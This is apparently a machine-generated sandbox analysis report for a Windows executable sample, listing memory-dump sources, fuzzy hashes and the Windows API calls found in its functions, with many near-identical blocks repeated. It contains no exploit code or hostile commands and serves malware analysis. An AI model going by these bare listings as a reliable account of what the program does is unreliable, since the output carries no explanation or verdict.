                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 0a684ce2c3edaff8fbec15c02d96e9211104f41710849b162c0012fef398fdf7
                • Instruction ID: d783e9a341688abbe1345c655c71c45f2295361605ed21274313c8a63bd63420
                • Opcode Fuzzy Hash: 0a684ce2c3edaff8fbec15c02d96e9211104f41710849b162c0012fef398fdf7
                • Instruction Fuzzy Hash: 33A001A62AD216BC310C7256AE16D3A076CE4C5BA53308A1AB51AD45CAA98858496A32
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: d9c92d2b98c16bc03de225d89a7737b3b86e20bc6fbc5dee4fa1e7140efd9ee5
                • Instruction ID: d783e9a341688abbe1345c655c71c45f2295361605ed21274313c8a63bd63420
                • Opcode Fuzzy Hash: d9c92d2b98c16bc03de225d89a7737b3b86e20bc6fbc5dee4fa1e7140efd9ee5
                • Instruction Fuzzy Hash: 33A001A62AD216BC310C7256AE16D3A076CE4C5BA53308A1AB51AD45CAA98858496A32
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 65567b9bd3dc4b08bd7b72ba1bce4f25c3b423909e25db972edfbbb322be8baa
                • Instruction ID: d783e9a341688abbe1345c655c71c45f2295361605ed21274313c8a63bd63420
                • Opcode Fuzzy Hash: 65567b9bd3dc4b08bd7b72ba1bce4f25c3b423909e25db972edfbbb322be8baa
                • Instruction Fuzzy Hash: 33A001A62AD216BC310C7256AE16D3A076CE4C5BA53308A1AB51AD45CAA98858496A32
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 396ed1a3e7cd397c963b80ed04194a99b8d433ed73dda1b5ba04adb45c7188d1
                • Instruction ID: 2a9aaf7ae5993c1fb96bb57cfb0bb4b468b053ce04aee3cd340cf862393cd97d
                • Opcode Fuzzy Hash: 396ed1a3e7cd397c963b80ed04194a99b8d433ed73dda1b5ba04adb45c7188d1
                • Instruction Fuzzy Hash: C1A011AA2AC20ABC300832002C0BC3A032CF0C0B30330880AB20BC00C2AE800C0A2232
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9d56bd61b43cec342de92722839909d3aae85d6bcbdc47d13b6b8eccd0598d8f
                • Instruction ID: 2a9aaf7ae5993c1fb96bb57cfb0bb4b468b053ce04aee3cd340cf862393cd97d
                • Opcode Fuzzy Hash: 9d56bd61b43cec342de92722839909d3aae85d6bcbdc47d13b6b8eccd0598d8f
                • Instruction Fuzzy Hash: C1A011AA2AC20ABC300832002C0BC3A032CF0C0B30330880AB20BC00C2AE800C0A2232
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 4f75796cd4381c9e73929b05bf995b13fa9a2e96e6aafefe5c82c5238ee865d8
                • Instruction ID: 2a9aaf7ae5993c1fb96bb57cfb0bb4b468b053ce04aee3cd340cf862393cd97d
                • Opcode Fuzzy Hash: 4f75796cd4381c9e73929b05bf995b13fa9a2e96e6aafefe5c82c5238ee865d8
                • Instruction Fuzzy Hash: C1A011AA2AC20ABC300832002C0BC3A032CF0C0B30330880AB20BC00C2AE800C0A2232
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: afedfcfa2af5bfb018a0899341a24d2011e4d05e874a6d31f183e458e3e5dcf7
                • Instruction ID: 2a9aaf7ae5993c1fb96bb57cfb0bb4b468b053ce04aee3cd340cf862393cd97d
                • Opcode Fuzzy Hash: afedfcfa2af5bfb018a0899341a24d2011e4d05e874a6d31f183e458e3e5dcf7
                • Instruction Fuzzy Hash: C1A011AA2AC20ABC300832002C0BC3A032CF0C0B30330880AB20BC00C2AE800C0A2232
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DC36
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 48167afae77c642e8def3ac1b1de55ab39e5b991c40846d8cb7762ae9ac5292c
                • Instruction ID: 90c2293cbbc830f25e24284b8ded51f11cfcd97d850d56bd19b6f6aad17b3c01
                • Opcode Fuzzy Hash: 48167afae77c642e8def3ac1b1de55ab39e5b991c40846d8cb7762ae9ac5292c
                • Instruction Fuzzy Hash: 9DA011AA2AC302BC300C32002C22C3A032CE0C0B20330880AF20AE02C2AA802C08A232
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DC36
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 4b6478b6f0d978f0eb83f3ab234d2f2b531f198e00b7a22bb13b8ac8d6cf3081
                • Instruction ID: 90c2293cbbc830f25e24284b8ded51f11cfcd97d850d56bd19b6f6aad17b3c01
                • Opcode Fuzzy Hash: 4b6478b6f0d978f0eb83f3ab234d2f2b531f198e00b7a22bb13b8ac8d6cf3081
                • Instruction Fuzzy Hash: 9DA011AA2AC302BC300C32002C22C3A032CE0C0B20330880AF20AE02C2AA802C08A232
                APIs
                • SetEndOfFile.KERNELBASE(?,00879104,?,?,-00001964), ref: 00879EC2
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: File
                • String ID:
                • API String ID: 749574446-0
                APIs
                • SetCurrentDirectoryW.KERNELBASE(?,0088A587,C:\Users\user\Desktop,00000000,008B946A,00000006), ref: 0088A326
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                APIs
                  • Part of subcall function 0087130B: GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                  • Part of subcall function 0087130B: SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0088B971
                • EndDialog.USER32(?,00000006), ref: 0088B984
                • GetDlgItem.USER32(?,0000006C), ref: 0088B9A0
                • SetFocus.USER32(00000000), ref: 0088B9A7
                • SetDlgItemTextW.USER32(?,00000065,?), ref: 0088B9E1
                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0088BA18
                • FindFirstFileW.KERNEL32(?,?), ref: 0088BA2E
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0088BA4C
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088BA5C
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088BA78
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088BA94
                • _swprintf.LIBCMT ref: 0088BAC4
                  • Part of subcall function 0087400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0087401D
                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0088BAD7
                • FindClose.KERNEL32(00000000), ref: 0088BADE
                • _swprintf.LIBCMT ref: 0088BB37
                • SetDlgItemTextW.USER32(?,00000068,?), ref: 0088BB4A
                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0088BB67
                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0088BB87
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088BB97
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088BBB1
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088BBC9
                • _swprintf.LIBCMT ref: 0088BBF5
                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0088BC08
                • _swprintf.LIBCMT ref: 0088BC5C
                • SetDlgItemTextW.USER32(?,00000069,?), ref: 0088BC6F
                  • Part of subcall function 0088A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0088A662
                  • Part of subcall function 0088A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,008AE600,?,?), ref: 0088A6B1
                Strings
                Similarity
                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                • API String ID: 797121971-1840816070
                APIs
                • __EH_prolog.LIBCMT ref: 00877191
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 008772F1
                • CloseHandle.KERNEL32(00000000), ref: 00877301
                  • Part of subcall function 00877BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877C04
                  • Part of subcall function 00877BF5: GetLastError.KERNEL32 ref: 00877C4A
                  • Part of subcall function 00877BF5: CloseHandle.KERNEL32(?), ref: 00877C59
                • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0087730C
                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0087741A
                • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00877446
                • CloseHandle.KERNEL32(?), ref: 00877457
                • GetLastError.KERNEL32 ref: 00877467
                • RemoveDirectoryW.KERNEL32(?), ref: 008774B3
                • DeleteFileW.KERNEL32(?), ref: 008774DB
                Strings
                Similarity
                • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                • API String ID: 3935142422-3508440684
                APIs
                Strings
                Similarity
                • API ID: H_prolog_memcmp
                • String ID: CMT$h%u$hc%u
                • API String ID: 3004599000-3282847064
                APIs
                Strings
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                APIs
                • __EH_prolog.LIBCMT ref: 008727F1
                • _strlen.LIBCMT ref: 00872D7F
                  • Part of subcall function 0088137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0087B652,00000000,?,?,?,000103EE), ref: 00881396
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00872EE0
                Strings
                Similarity
                • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                • String ID: CMT
                • API String ID: 1706572503-2756464174
                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00898767
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00898771
                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0089877E
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                Strings
                Similarity
                • API ID:
                • String ID: .
                • API String ID: 0-248832578
                APIs
                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0088A662
                • GetNumberFormatW.KERNEL32(00000400,00000000,?,008AE600,?,?), ref: 0088A6B1
                Similarity
                • API ID: FormatInfoLocaleNumber
                • String ID:
                • API String ID: 2169056816-0
                APIs
                • GetLastError.KERNEL32(0088117C,?,00000200), ref: 00876EC9
                • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00876EEA
                Similarity
                • API ID: ErrorFormatLastMessage
                • String ID:
                • API String ID: 3479602957-0
                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008A118F,?,?,00000008,?,?,008A0E2F,00000000), ref: 008A13C1
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                Strings
                Similarity
                • API ID:
                • String ID: gj
                • API String ID: 0-4203073231
                APIs
                • GetVersionExW.KERNEL32(?), ref: 0087AD1A
                Similarity
                • API ID: Version
                • String ID:
                • API String ID: 1889659487-0
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0088EAC5), ref: 0088F068
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 0206cbbd3353ba9880bbba2a7d5f502accf7e5317eea9c61b037e6f904a44131
                • Instruction ID: f3f89aa97c287798f1b8de0e3fbdeacccc16cecd0e98cecfc453af5b970b1e77
                • Opcode Fuzzy Hash: 0206cbbd3353ba9880bbba2a7d5f502accf7e5317eea9c61b037e6f904a44131
                • Instruction Fuzzy Hash:
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 03a5f66622f048cb55bba929da180cfeb57caf6d56c3b76edef0d82364f9dc24
                • Instruction ID: d5e18a701a45272983422a1a15fa4c98f2e6cadf73c427e8329dc592132b85b4
                • Opcode Fuzzy Hash: 03a5f66622f048cb55bba929da180cfeb57caf6d56c3b76edef0d82364f9dc24
                • Instruction Fuzzy Hash: 3CA001B46026019BAB408FB6BA0D2097BA9BA56691709C26AB509C6560EA2485609F01
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                • Instruction ID: 0e2e8fdb951704f89fab4609cd1876a714da9095a6ae4cd86ae4293266c3224e
                • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                • Instruction Fuzzy Hash: 78620671604B898FCB29EF28C9906B9BBE1FF55304F04856DD8AACB346E730E955CB14
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                • Instruction ID: 24b9a8e56cb577efcff12ce698fb3b0917e7b79a61b339ae15b7f9b54ace04f9
                • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                • Instruction Fuzzy Hash: 4062127160878A9FC719EF28C8805A9BBF1FF55308F24866DD8AAC7742D730E955CB81
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                • Instruction ID: d899c1d100f3005c06a902e102f88f5ebdac84c1b1baa22541ff3bd49392c4d5
                • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                • Instruction Fuzzy Hash: 82523AB26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA19CB86
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
